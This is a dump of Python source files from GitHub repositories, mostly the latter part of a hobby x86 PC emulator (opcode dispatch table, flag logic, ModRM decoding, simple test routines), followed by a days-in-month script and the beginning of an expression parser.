cpu.RTr8),#1C\n lambda x : self.op_sbb(\n self.Srxiz, cpu.rax_, self.DB),#1D\n lambda x : self.op_push(\n self.Srx, cpu.ds_, 0),#1E #16bit\n lambda x : self.op_pop(\n self.Srx, cpu.ds_, 0),#1F #16bit\n\n lambda x : self.op_and(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#20\n lambda x : self.op_and(\n self.Mrmyrx, self.DB, self.DB),#21\n lambda x : self.op_and(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#22\n lambda x : self.op_and(\n self.Mrxrmy, self.DB, self.DB),#23\n lambda x : self.op_and(\n self.Srxiz, cpu.al_, cpu.RTr8),#24\n lambda x : self.op_and(\n self.Srxiz, cpu.rax_, self.DB),#25\n lambda x : self.op_push(\n self.Srx, cpu.es_, 0),#26 #16bit\n lambda x : self.op_daa(\n self.Srx, cpu.al_, 0),#27 #16bit\n\n lambda x : self.op_sub(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#28\n lambda x : self.op_sub(\n self.Mrmyrx, self.DB, self.DB),#29\n lambda x : self.op_sub(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#2A\n lambda x : self.op_sub(\n self.Mrxrmy, self.DB, self.DB),#2B\n lambda x : self.op_sub(\n self.Srxiz, cpu.al_, cpu.RTr8),#2C\n lambda x : self.op_sub(\n self.Srxiz, cpu.rax_, self.DB),#2D\n lambda x : self.op_segoverride(\n self.Srx, cpu.cs_,0),#2E #16bit\n lambda x : self.op_das(\n self.Srx, cpu.al_, 0),#2F #16bit\n\n lambda x : self.op_xor(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#30\n lambda x : self.op_xor(\n self.Mrmyrx, self.DB, self.DB),#31\n lambda x : self.op_xor(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#32\n lambda x : self.op_xor(\n self.Mrxrmy, self.DB, self.DB),#33\n lambda x : self.op_xor(\n self.Srxiz, cpu.al_, cpu.RTr8),#34\n lambda x : self.op_xor(\n self.Srxiz, cpu.rax_, self.DB),#35\n lambda x : self.op_segoverride(\n self.Srx, cpu.ss_, 0),#36 #16bit\n lambda x : self.op_aaa(\n self.Srxrx, cpu.al_, cpu.ah_),#37\n\n\n lambda x : self.op_cmp(\n self.Mrmyrx, cpu.RTr8, cpu.RTr8),#38\n lambda x : self.op_cmp(\n self.Mrmyrx, self.DB, self.DB),#39\n lambda x : self.op_cmp(\n self.Mrxrmy, cpu.RTr8, cpu.RTr8),#3A\n lambda x : self.op_cmp(\n self.Mrxrmy, self.DB, self.DB),#3B\n lambda x : self.op_cmp(\n self.Srxiz, cpu.al_, cpu.RTr8),#3C\n lambda x : self.op_cmp(\n self.Srxiz, cpu.rax_, self.DB),#3D\n lambda x : self.op_segoverride(\n self.Srx, cpu.ds_, 0),#3E\n lambda x : self.op_aas(\n self.Srxrx, cpu.al_, cpu.ah_),#3F\n\n lambda x : self.op_inc(),#40\n lambda x : self.op_inc(),#41\n lambda x : self.op_inc(),#42\n lambda x : self.op_inc(),#43\n lambda x : self.op_inc(),#44\n lambda x : self.op_inc(),#45\n lambda x : self.op_inc(),#46\n lambda x : self.op_inc(),#47\n lambda x : self.op_dec(),#48\n lambda x : self.op_dec(),#49\n lambda x : self.op_dec(),#4A\n lambda x : self.op_dec(),#4B\n lambda x : self.op_dec(),#4C\n lambda x : self.op_dec(),#4D\n lambda x : self.op_dec(),#4E\n lambda x : self.op_dec(),#4F\n\n lambda x : self.op_push(\n self.SSrx, cpu.r_rax, self.DB),#50\n lambda x : self.op_push(\n self.SSrx, cpu.r_rcx, self.DB),#51\n lambda x : self.op_push(\n self.SSrx, cpu.r_rdx, self.DB),#52\n lambda x : self.op_push(\n self.SSrx, cpu.r_rbx, self.DB),#53\n lambda x : self.op_push(\n self.SSrx, cpu.r_rsp, self.DB),#54\n lambda x : self.op_push(\n self.SSrx, cpu.r_rbp, self.DB),#55\n lambda x : self.op_push(\n self.SSrx, cpu.r_rsi, self.DB),#56\n lambda x : self.op_push(\n self.SSrx, cpu.r_rdi, self.DB),#57\n\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rax, self.DB),#58\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rcx, self.DB),#59\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rdx, self.DB),#5A\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rbx, self.DB),#5B\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rsp, self.DB),#5C\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rbp, self.DB),#5D\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rsi, self.DB),#5E\n lambda x : self.op_pop(\n self.SSrx, cpu.r_rdi, self.DB),#5F\n\n lambda x : self.op_pusha(\n self.noArgs,0,0),#60\n lambda x : self.op_popa(\n self.noArgs,0,0),#61\n lambda x : self.op_bound(\n self.Mrxrmy, self.DB, self.DB),#62\n lambda x : self.op_arpl(\n self.Mrmyrx, cpu.RTr16, cpu.RTr16),#63\n lambda x : self.op_segoverride(\n self.Srx, cpu.fs_, 0),#64\n lambda x : self.op_segoverride(\n self.Srx, cpu.gs_, 0),#65\n \n lambda x : self.prefix(),#66\n lambda x : self.prefix(),#67\n lambda x : self.prefix(),#68\n \n lambda x : self.op_push(\n self.Siz, self.DB,0),#69\n \n lambda x : self.op_imul(\n self.Mrmy, self.DB, self.DB),#6A\n \n lambda x : self.op_push(\n self.Siz, cpu.RTr8, 0),#6B\n \n lambda x : self.op_ins(\n \tself.Sarg, cpu.RTr8, 0),#6C\n lambda x : self.op_ins(\n \tself.Sarg, self.DB, 0),#6D\n \n lambda x : self.op_outs(\n \tself.Sarg, cpu.RTr8, 0),#6E\n lambda x : self.op_outs(\n \tself.Sarg, self.DB, 0),#6F\n \n lambda x : self.op_jo(\n \tself.Siz, cpu.RTr8, True),#70 jo\n lambda x : self.op_jo(\n \tself.Siz, cpu.RTr8, False),#71 jno\n lambda x : self.op_jc(\n \tself.Siz, cpu.RTr8, True),#72 jc\n lambda x : self.op_jc(\n \tself.Siz, cpu.RTr8, False),#73 jnc\n lambda x : self.op_jz(\n \tself.Siz, cpu.RTr8, True),#74 jz\n lambda x : self.op_jz(\n \tself.Siz, cpu.RTr8, False),#75 jnz\n lambda x : self.op_jbe(\n \tself.Siz, cpu.RTr8, True),#76 jbe\n lambda x : self.op_jbe(\n \tself.Siz, cpu.RTr8, False),#77 jnbe\n lambda x : self.op_js(\n \tself.Siz, cpu.RTr8, True),#78 js\n lambda x : self.op_js(\n \tself.Siz, cpu.RTr8, False),#79 jns\n lambda x : self.op_jp(\n \tself.Siz, cpu.RTr8, True),#7A jp\n lambda x : self.op_jp(\n \tself.Siz, cpu.RTr8, False),#7B jnp\n lambda x : self.op_jl(\n \tself.Siz, cpu.RTr8, True),#7C jl\n lambda x : self.op_jl(\n \tself.Siz, cpu.RTr8, False),#7D jnl\n lambda x : self.op_jle(\n \tself.Siz, cpu.RTr8, True),#7E jle\n lambda x : self.op_jle(\n \tself.Siz, cpu.RTr8, False),#7F jnle\n \t\n lambda x : self.op_8x(\n \tself.Mrmyiz, cpu.RTr8, cpu.RTr8),#80\n lambda x : self.op_8x(\n \tself.Mrmyiz, self.DB, self.DB),#81\n lambda x : self.op_8x(\n \tself.Mrmyiz, cpu.RTr8, cpu.RTr8),#82\n lambda x : self.op_8x(\n \tself.Mrmyiz, self.DB, cpu.RTr8),#83\n \n lambda x : self.op_test(\n \tself.Mrmyrx, cpu.RTr8, cpu.RTr8),#84\n lambda x : self.op_test(\n \tself.Mrmyrx, self.DB, self.DB),#85\n \n lambda x : self.op_xchg(\n \tself.Mrxrmy, cpu.RTr8, cpu.RTr8),#86\n lambda x : self.op_xchg(\n \tself.Mrmyrx, self.DB, self.DB),#87\n \t\n lambda x : self.op_mov(\n \tself.Mrmyrx, cpu.RTr8, cpu.RTr8),#88\n lambda x : self.op_mov(\n \tself.Mrmyrx, self.DB, self.DB),#89\n lambda x : self.op_mov(\n \tself.Mrxrmy, cpu.RTr8, cpu.RTr8),#8A\n lambda x : self.op_mov(\n \tself.Mrxrmy, self.DB, self.DB),#8B\n \n lambda x : self.op_mov(\n \tself.Mrmyrx, self.DB, cpu.sreg),#8C\n \n lambda x : self.op_lea(\n \tself.Mrxrmy, self.DB, self.DB),#8D\n \n lambda x : self.op_mov(\n \tself.Mrxrmy, cpu.sreg, cpu.RTr16),#8E\n \n lambda x : self.op_pop(\n \tself.Mrmy, self.DB, self.DB),#8F\n \n lambda x : self.op_ ,#90\n lambda x : self.op_ ,#91\n lambda x : self.op_ ,#92\n lambda x : self.op_ ,#93\n lambda x : self.op_ ,#94\n lambda x : self.op_ ,#95\n lambda x : self.op_ ,#96\n lambda x : self.op_ ,#97\n lambda x : self.op_ ,#98\n lambda x : self.op_ ,#99\n lambda x : self.op_ ,#9A\n lambda x : self.op_ ,#9B\n lambda x : self.op_ ,#9C\n lambda x : self.op_ ,#9D\n lambda x : self.op_ ,#9E\n lambda x : self.op_ ,#9F\n lambda x : self.op_ ,#A0\n lambda x : self.op_ ,#A1\n lambda x : self.op_ ,#A2\n lambda x : self.op_ ,#A3\n lambda x : self.op_ ,#A4\n lambda x : self.op_ ,#A5\n lambda x : self.op_ ,#A6\n lambda x : self.op_ ,#A7\n lambda x : self.op_ ,#A8\n lambda x : self.op_ ,#A9\n lambda x : self.op_ ,#AA\n lambda x : self.op_ ,#AB\n lambda x : self.op_ ,#AC\n lambda x : self.op_ ,#AD\n lambda x : self.op_ ,#AE\n lambda x : self.op_ ,#AF\n \n lambda x : self.op_mov(\n \tself.Srxiz, cpu.al_, cpu.RTr8),#B0\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.cl_, cpu.RTr8) ,#B1\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.dl_, cpu.RTr8) ,#B2\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.bl_, cpu.RTr8) ,#B3\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.ah_, cpu.RTr8) ,#B4\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.ch_, cpu.RTr8) ,#B5\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.dh_, cpu.RTr8) ,#B6\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.bh_, cpu.RTr8) ,#B7\n \n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rax][self.DB], self.DB),#B8\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rcx][self.DB], self.DB) ,#B9\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rdx][self.DB], self.DB) ,#BA\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rbx][self.DB], self.DB) ,#BB\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rsp][self.DB], self.DB) ,#BC\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rbp][self.DB], self.DB) ,#BD\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rsi][self.DB], self.DB) ,#BE\n lambda x : self.op_mov(\n \tself.Srxiz, cpu.mod1116[self.rexb][cpu.r_rdi][self.DB], self.DB) ,#BF\n \t\n lambda x : self.op_ ,#C0\n lambda x : self.op_ ,#C1\n lambda x : self.op_ ,#C2\n lambda x : self.op_ ,#C3\n lambda x : self.op_ ,#C4\n lambda x : self.op_ ,#C5\n lambda x : self.op_ ,#C6\n lambda x : self.op_ ,#C7\n lambda x : self.op_ ,#C8\n lambda x : self.op_ ,#C9\n lambda x : self.op_ ,#CA\n lambda x : self.op_ ,#CB\n lambda x : self.op_ ,#CC\n lambda x : self.intImm8() ,#CD\n lambda x : self.op_ ,#CE\n lambda x : self.op_ ,#CF\n lambda x : self.op_ ,#D0\n lambda x : self.op_ ,#D1\n lambda x : self.op_ ,#D2\n lambda x : self.op_ ,#D3\n lambda x : self.op_ ,#D4\n lambda x : self.op_ ,#D5\n lambda x : self.op_ ,#D6\n lambda x : self.op_ ,#D7\n lambda x : self.op_ ,#D8\n lambda x : self.op_ ,#D9\n lambda x : self.op_ ,#DA\n lambda x : self.op_ ,#DB\n lambda x : self.op_ ,#DC\n lambda x : self.op_ ,#DD\n lambda x : self.op_ ,#DE\n lambda x : self.op_ ,#DF\n lambda x : self.op_ ,#E0\n lambda x : self.op_ ,#E1\n lambda x : self.op_ ,#E2\n lambda x : self.op_ ,#E3\n lambda x : self.op_ ,#E4\n lambda x : self.op_ ,#E5\n lambda x : self.op_ ,#E6\n lambda x : self.op_ ,#E7\n lambda x : self.op_ ,#E8\n lambda x : self.op_ ,#E9\n lambda x : self.op_ ,#EA\n lambda x : self.op_jmpRel8() ,#EB\n lambda x : self.op_ ,#EC\n lambda x : self.op_ ,#ED\n lambda x : self.op_ ,#EE\n lambda x : self.op_ ,#EF\n lambda x : self.op_ ,#F0\n lambda x : self.op_ ,#F1\n lambda x : self.op_ ,#F2\n lambda x : self.op_ ,#F3\n lambda x : self.op_ ,#F4\n lambda x : self.op_ ,#F5\n lambda x : self.op_ ,#F6\n lambda x : self.op_ ,#F7\n lambda x : self.op_ ,#F8\n lambda x : self.op_ ,#F9\n lambda x : self.op_ ,#FA\n lambda x : self.op_ ,#FB\n lambda x : self.op_ ,#FC\n lambda x : self.op_ ,#FD\n lambda x : self.op_ ,#FE\n \n ]\n\n self.initReg()\n\n\n def tocomp(self,r1,rt):\n t = (~r1) + 1\n if r1 == 0 or t > cpu.mask[rt]:\n self._ccf = 1\n else:\n self._ccf = 0\n #cpu.dbgp('tocomp: {0} -> {1}'.format(r1,t&cpu.mask[rt]))\n return t & cpu.mask[rt]\n\n\n def tocomp2(self,ru,rl,rt):\n rl2 = self.tocomp(rl,rt)\n if self._ccf == 1:\n ru2 = self.tocomp(ru,rt)\n else:\n ru2 = (~ru) & cpu.mask[rt]\n\n #s = 'tocomp2: u:l={0}:{1}={8}:{9}=val:{2}|{3} -> ru:rl={4}:{5}={10}:{11}=val:{6}|{7}'.format(ru, rl, (ru<T\n v1 & v2=msb 0 & v3=msb 1 ->T\n '''\n c1 = cpu.chkMSB(v1,rt)\n c2 = cpu.chkMSB(v2,rt)\n c3 = cpu.chkMSB(v3,rt)\n s='chkOF: op1MSB[{0}] op2MSB[{1}] resultMSB[{2}] ->'.format(c1,c2,c3)\n if ( c1 and c2 and (not c3)) or ( (not c1) and (not c2) and c3 ):\n s=s+'True'\n cpu.dbgp(s)\n return True\n else:\n s=s+'False'\n cpu.dbgp(s)\n return False\n\n\n def chkCF(val):\n s='chkCF:{0}'.format(val)\n cpu.dbgp(s)\n return True if val == 1 else False\n\n def chkZF(val,rt):\n '''\n val is all 0 -> T\n '''\n mask = cpu.mask[rt]\n v = val & mask\n retval = True if v == 0 else False\n s='chkZF:{0:b}({0}) & mask({1:b})({1}) -> {2:b}({2}) ZF:{3}'.format(val,mask,v,retval)\n cpu.dbgp(s)\n return retval\n\n\n def chkMSB(val,rt):\n mask = cpu.maskMSB[rt]\n v = val & mask\n retval = True if v >0 else False\n s='chkMSB/SF[mask({2:0b})({2})]:{0:b}({0}) -> MSB:{1:b}({1}) SF:{3}'.format(val , v, mask, retval)\n cpu.dbgp(s)\n return retval\n\n\n def chkPF(val,rt):\n v = val & 0x0F # least byte\n # 0,3,5,9,10,12,15(0,2,2,2,2,2,4)\n if v == 0b0011 or v == 0b0101 or v == 0b1001 or v == 0b1010 or v == 0b1100 or v == 0x00 or v == 0x1111:\n retval = True\n else:\n retval = False\n s='chkPF:{0:b}({0}) -> mask(1111)(15):{1:b}({1}) PF:{2}'.format(val , v, retval)\n cpu.dbgp(s)\n return retval\n\n\n\n def chkAF(v1,v2,v3):\n '''\n example\n 5b 5b 5b\n 00100 + 01000 = 01100 0 0 0 nc\n 01000 + 01000 = 10000 0 0 1 c\n 10000 + 01000 = 11000 1 0 1 nc\n 11000 + 01000 =100000 1 0 0 c\n 01000 + 10000 = 11000 0 1 1 nc\n 10000 + 10000 =100000 1 1 0 nc\n 11000 + 10000 =101000 1 1 0 nc\n 01000 + 11000 =100000 0 1 0 c\n 10000 + 11000 =101000 1 1 0 nc\n 11000 + 11000 =110000 1 1 1 c\n\n 5bit's pattern\n s s d\n 0 0 = 0 n no carried\n 0 0 = 1 c carried\n 0 1 = 0 c carried\n 0 1 = 1 n no carried\n 1 0 = 0 c carried\n 1 0 = 1 n no carried\n 1 1 = 0 n no carried\n 1 1 = 1 c carried\n\n TRue's pattern(carried)\n v1+v2=0 and v3=1\n v1+v2=1 and v3=0\n v1+v2=2 and v3=1\n '''\n v12 = (v1 & 0x10) + (v2 & 0x10)\n v33 = v3 & 0x10\n if (v12 == 0 and v33 == 0x10) or (v12 == 0x10 and v33 == 0) or (v12 == 0x20 and v33 == 0x10):\n retval = True\n else:\n retval = False\n s='chkAF:{0:09b}({0}) , {1:09b}({1}) -> {2:09b}({2}) AF:{3}'.format(v1,v2,v3,retval)\n cpu.dbgp(s)\n return retval\n\n\n def flagchk(self,flg,o1,o2,r,rt):\n if flg & cpu.CF:\n if cpu.chkCF(self._scf):\n self.flagOn(cpu.CF)\n else:\n self.flagOff(cpu.CF)\n\n if flg & cpu.ZF :\n if cpu.chkZF(r,rt):\n self.flagOn(cpu.ZF)\n else:\n self.flagOff(cpu.ZF)\n\n if flg & cpu.OF :\n if cpu.chkOF(o1,o2,r,rt):\n self.flagOn(cpu.OF)\n else:\n self.flagOff(cpu.OF)\n\n if flg & cpu.SF :\n if cpu.chkMSB(r,rt):\n self.flagOn(cpu.SF)\n else:\n self.flagOff(cpu.SF)\n\n if flg & cpu.AF :\n if cpu.chkAF(o1,o2,r):\n self.flagOn(cpu.AF)\n else:\n self.flagOff(cpu.AF)\n\n if flg & cpu.PF :\n if cpu.chkPF(r,rt):\n self.flagOn(cpu.PF)\n else:\n self.flagOff(cpu.PF)\n pass\n\n\n def getflag(self,flg):\n return True if self.eflags & flg else False\n\n\n def flagOff(self,flag):\n v = self.eflags & ( ~flag )\n self.eflags = v\n #cpu.dbgp('flagOff:{1:b} eflags:{0:b}'.format(self.eflags,flag))\n return self.eflags\n\n\n\n def flagOn(self,flag):\n v = self.eflags | flag\n self.eflags = v\n #cpu.dbgp('flagOn:{1:b} eflags:{0:b}'.format(self.eflags,flag))\n return self.eflags\n\n\n\n def dumpRegister(self,index):\n if index == -1 :\n print('DumpRegister')\n for i in range(0, cpu.r_NREG):\n rp=cpu.r2reg[i]\n s='[{0}]:{1} '.format(cpu.regp[rp][2], hex(self.rReg(rp)))\n print(s,end=\"\")\n print()\n elif index < -1 :\n print('DumpRegister Main')\n for i in range(0, 8):\n rp=cpu.r2reg[i]\n s='[{0}]:{1} '.format(cpu.regp[rp][2], hex(self.rReg(rp)))\n print(s,end=\"\")\n print()\n else:\n s='[{0}]:{1}'.format(cpu.regp[index][2] , hex(self.rReg(index)))\n print(s)\n\n s='DB:{0}'.format(self.DB)\n cpu.dbgp(s)\n\n print('eip:0x{0:X}({0})'.format(self.eip))\n s='eflags:{0:b}'.format(self.eflags)\n print(s)\n\n '''\n OF=2**11 #status:overflow\n DF=2**10 #control:direction\n IF=2**9 #control:interrupt\n TF=2**8 #control:trap\n SF=2**7 #status:sign\n ZF=2**6 #status:zero\n AF=2**4 #status:auxiliary carry\n PF=2**2 #statis:parity\n CF=2**0 #status:carry\n '''\n s='OB:{0} DA:{1} I9:{2} T8:{3} S7:{4} Z6:{5} A4:{6} P2:{7} C0:{8}'.format(\n True if self.eflags & cpu.OF else False ,\n True if self.eflags & cpu.DF else False ,\n True if self.eflags & cpu.IF else False ,\n True if self.eflags & cpu.TF else False ,\n True if self.eflags & cpu.SF else False ,\n True if self.eflags & cpu.ZF else False ,\n True if self.eflags & cpu.AF else False ,\n True if self.eflags & cpu.PF else False ,\n True if self.eflags & cpu.CF else False)\n print(s)\n\n\n\n def dumpMemory(self,start,finish):\n for i in range(start,finish+1):\n m = i % (self.mem.memmax + 1)\n print('mem[{2}:{0}]:0x{1:X}({1})'.format(m, self.rMem(m, cpu.RTr8,0),0))\n\n def opstat(o1,o2,r,rt):\n s='opstat OP1:0x{0:X}({0})({1}) OP2:0x{2:X}({2})({3}) -> RESULT:0x{4:X}({5})({3})'.format(o1 , cpu.sb2sd(o1,rt) , o2 , cpu.sb2sd(o2,rt) , r , cpu.sb2sd(r,rt))\n cpu.dbgp(s)\n\n\n\n def readMem(self,seg):\n #v = self.mem.get(self.eip)\n v = self.rMem(self.eip, cpu.RTr8, seg)\n s = 'readM[{2}:{0}]:0x{1:X}({1})'.format(self.eip , v & cpu.mask[cpu.RTr8], seg)\n cpu.dbgp(s)\n return (v & cpu.mask[cpu.RTr8])\n\n\n def readNextMem(self,seg):\n self.eip += 1\n #v = self.mem.get(self.eip)\n v = self.rMem(self.eip, cpu.RTr8, seg)\n s = 'readNM[{2}:{0}]:0x{1:X}({1})'.format(self.eip , v & cpu.mask[cpu.RTr8] ,seg)\n cpu.dbgp(s)\n return (v & cpu.mask[cpu.RTr8])\n\n\n\n def ModRM(self, mod, RTro, RTrm):\n self.Mro = (mod & cpu.maskRG)>>cpu.shftG\n self.Mrm = (mod & cpu.maskRM)\n self.Mod = (mod & cpu.maskMB)>>cpu.shftM\n s='ModRM:0x{0:02X} Mod:{1:02b}({1}) Reg:{2:03b}({2}) rm:{3:03b}({3})'.format(mod, self.Mod, self.Mro, self.Mrm)\n #self.dumpMemory(self.eip,self.eip+3)\n cpu.dbgp(s)\n\n if not self.Mod == 0b11:\n self.ro = cpu.mod1116[self.rexb][self.Mro][RTro]\n\n self.rm = (self.ftbl16[self.Mod][self.Mrm])()\n s='ModRM: reg={0} rm=M[{1}]:{2}'.format(cpu.regp[self.ro][2], self.rm, self.rMem(self.rm,RTrm,self.CS))\n cpu.dbgp(s)\n else:\n self.rm = cpu.mod1116[self.rexb][self.Mrm][RTrm]\n self.ro = cpu.mod1116[self.rexb][self.Mro][RTro]\n s='ModRM: reg={0} rm={1}({2})'.format(cpu.regp[self.ro][2], cpu.regp[self.rm][2],self.rReg(self.rm))\n cpu.dbgp(s)\n\n self.drm = self.Mod\n\n return self.Mod, self.Mro, self.Mrm\n\n\n\n def segOVR(self,defaultseg):\n return self.segOV if self.override == True else defaultseg\n\n\n\n def intImm8(self):\n Imm8 = self.readNextMem(self.CS)\n\n if Imm8 == 0x10 :\n ah=self.rReg(cpu.ah_)\n al=self.rReg(cpu.al_)\n s='INT 0x{0:X}'.format(Imm8)\n cpu.msg(s)\n if ah == 0 and al == 0x03:\n pass\n elif ah == 0x0E :\n if al == ord('\\n') :\n cpu.msg(\n self.displaytext\n )\n self.dumpMemory(self.eip, self.eip)\n else:\n cpu.msg(\n chr(al)\n )\n self.displaytext += chr(al)\n else:\n s='Not Implemented data'.format(self.rReg(cpu.rax_))\n cpu.msg(s)\n raise Exception\n else:\n s='Not Implemented Imm={0}'.format(Imm8)\n cpu.msg(s)\n raise Exception\n\n\n def run(self,eip,size):\n self.eip=eip\n runflag = True\n while runflag == True :\n self.op = self.rMem(self.eip, cpu.RTr8, self.CS)\n s='=== run [{2}:{0}]:op=0x{1:02X}'.format(self.eip, self.op, self.CS)\n #cpu.msg(s)\n cpu.dbgp(s)\n if not self.eip == size:\n self.execute(self.op)\n self.opStr = ''\n else:\n runflag = False\n cpu.msg('End')\n raw=input('hit any')\n sys.exit(0)\n self.eip += 1\n\n\n\n def execute(self,op):\n '''\n show operand\n '''\n s = 'execute [{0}]:op=0x{0:02X} '.format( self.eip , op )\n cpu.msg(s)\n\n\n def load(self,filename):\n try:\n with open(filename,'rb') as f:\n i = 0\n b = f.read(1)\n while not b == b'' :\n self.wMem(i, cpu.b2i(b), cpu.RTr8, self.CS)\n b = f.read(1)\n i += 1\n return i\n except:\n s='{0} open error'.format(filename)\n cpu.msg(s)\n raise Exception\n\n\n def b2i(val):\n return int.from_bytes(val , byteorder = 'little')\n\n def setrex(self,op):\n self.rexw = self.rexr = self.rexx = self.rexb = 0\n\n self.rexb = op & cpu.REXb\n self.rexx = op & cpu.REXx\n self.rexr = op & cpu.REXr\n self.rexw = op & cpu.REXw\n\n\n def chDB(self): #16 or 32\n db = ((self.DB + 1) % cpu.RTr16) + cpu.RTr16\n self.DB = db\n\n\n def chDB_R(self): #32 or 64\n db =((self.DB + 1) % cpu.RTr32) + cpu.RTr32\n self.DB = db\n\n\nif __name__ == '__main__':\n c=cpu(memory(1))\n print('Reprensative Register')\n print(cpu.r2reg)\n input()\n\n print(cpu.regp[c.mod1116[0][cpu.rax_][cpu.RTr8]][2])\n input()\n\n c.dumpRegister(-2)\n c.wReg(cpu.rax_,0x1234557890)\n c.wReg(cpu.ah_,0x20)\n c.wReg(cpu.ch_,0xff)\n c.wReg(cpu.xmm7_,0xfffdffdfd)\n c.dumpRegister(cpu.ah_)\n c.dumpRegister(-2)\n s=cpu.signex(0xff01, cpu.RTr16, cpu.RTr32)\n print(hex(s),cpu.sb2sd(s,cpu.RTr32))\n\n\n c.wReg(cpu.eax_,0x0E00+ord('a'))\n c.wMem(1,0x10, cpu.RTr8, c.CS)\n c.dumpMemory(0,10)\n c.eip=0\n c.intImm8()\n\n size=c.load('HelloWorld')\n #c.run(0,size)\n\n c.dumpMemory(0,10)\n c.dumpMemory(940,944)\n c.dumpRegister(-2)\n m = c.ModRM(0b10101110, cpu.RTr8, cpu.RTr8)\n print(c.Mod,c.Mro,c.Mrm, c.rReg(c.ro),c.rm)\n\n def testModRM():\n print()\n print('test ModRM')\n c.eip=0\n modp=[\n 0b00000000,\n 0b01000000,\n 0b10000000,\n 0b11000000\n ]\n pt=[\n ['bx+si',\n 'bx+di',\n 'bp+si',\n 'bp+di',\n 'si',\n 'di',\n 'disp16',\n 'bx'],\n ['bx+si+disp8',\n 'bx+di+disp8',\n 'bp+si+disp8',\n 'bp+di+disp8',\n 'si+disp8',\n 'di+disp8',\n 'bp+disp16',\n 'bx+disp8'],\n ['bx+si+disp16',\n 'bx+di+disp16',\n 'bp+si+disp16',\n 'bp+di+disp16',\n 'si+disp16',\n 'di+disp16',\n 'bp+disp16',\n 'bx+disp16'],\n ['al ax',\n 'cl cx',\n 'dl dx',\n 'bl bx',\n 'ah sp',\n 'ch bp',\n 'dh si',\n 'bh di']\n ]\n\n for i in range(0,35):\n c.wReg(i,i)\n\n #for i in range(0,c.mem.memmax):\n #c.wMem(i,i,cpu.RTr8,0)\n\n j=0\n for p in modp[0:3]:\n for i in range(0,8):\n mod = p |(i<<3)|i\n c.ModRM(mod,cpu.RTr8,cpu.RTr8)\n\n s='{0:08b}:'.format(mod)+pt[j][i]+':'+str(c.rm)\n print(s)\n c.dumpRegister(-2)\n c.dumpMemory(c.eip,c.eip+5)\n c.dumpMemory(c.rm,c.rm+5)\n\n j += 1\n\n\n\n\n testModRM()\n\n def rexp():\n print('rex.b:{0}'.format(c.rexb))\n print('rex.x:{0}'.format(c.rexx))\n print('rex.r:{0}'.format(c.rexr))\n print('rex.w:{0}'.format(c.rexw))\n\n def testrex():\n for i in range(0x40,0x50):\n c.setrex(i)\n print('rex:{0:08b}'.format(i))\n\n def testchdb():\n print('DB={0} 2=>16 3=>32'.format(c.DB))\n c.chDB()\n print('changed DB:{0}'.format(c.DB))\n c.chDB()\n print('changed DB:{0}'.format(c.DB))\n c.chDB()\n print('changed DB:{0}'.format(c.DB))\n\n testrex()\n c.setrex(0)\n rexp()\n\n testchdb()\n\n def testflagchk():\n flg = cpu.CF|cpu.AF\n c.flagchk(flg,127,127,254,cpu.RTr8)\n c.dumpRegister(-2)\n flg = cpu.CF|cpu.AF|cpu.ZF|cpu.PF\n c.flagchk(flg,127,202,329,cpu.RTr8)\n c.dumpRegister(-2)\n cpu.msg(cpu.sb2sd(256,cpu.RTr8))\n\n testflagchk()\n","repo_name":"moto38/x86-PC-emulator","sub_path":"x86base.py","file_name":"x86base.py","file_ext":"py","file_size_in_byte":50407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71465977689","text":"year = int(input('Enter the year: '))\r\nmonth = input('Enter the month: ')\r\n\r\nmonths_31 = ['January', 'March', 'May', 'July', 'August', 'October', 'December']\r\nmonths_30 = ['April', 'June', 'September', 'November']\r\n\r\nif month in months_31:\r\n print('31')\r\nif month in months_30:\r\n print('30')\r\nif month == 'February':\r\n if year % 4 == 0 and year % 100 != 0:\r\n print('29')\r\n elif year % 400 == 0:\r\n print('29')\r\n else:\r\n print('28')\r\n","repo_name":"ArmaanBrar2001/100-Days-Coding-Python","sub_path":"day-7.py","file_name":"day-7.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28381160490","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 25.09.2017\n\n@author: Leonard\n'''\n#from Expression import Expression,ExpressionBlock,NumberElement,VariableElement\n#from OperatorElement import multiplyOperator\n#from PredefinedObjects import functions\nimport Expression\nimport Tools\nimport PredefinedObjects\nimport warnings\n\nSTARTBLOCK = ['(','[']\nENDBLOCK = [')',']']\n\nexpression = Expression.Expression()\n\ndef ParseInput(input):\n global expression\n PredefinedObjects.SetupObjects()\n expression.expressions = ParseString(input).expressions\n return expression\n \ndef ParseString(s):\n exp = Expression.ExpressionBlock()\n cur_block,i = ParseBlock(s,0,0)\n for el in cur_block.expressions:\n exp.expressions.append(el)\n\n \n exp.expressions = PackFunctions(exp)\n exp.expressions = PackPowerBlocks(exp)\n exp.expressions = 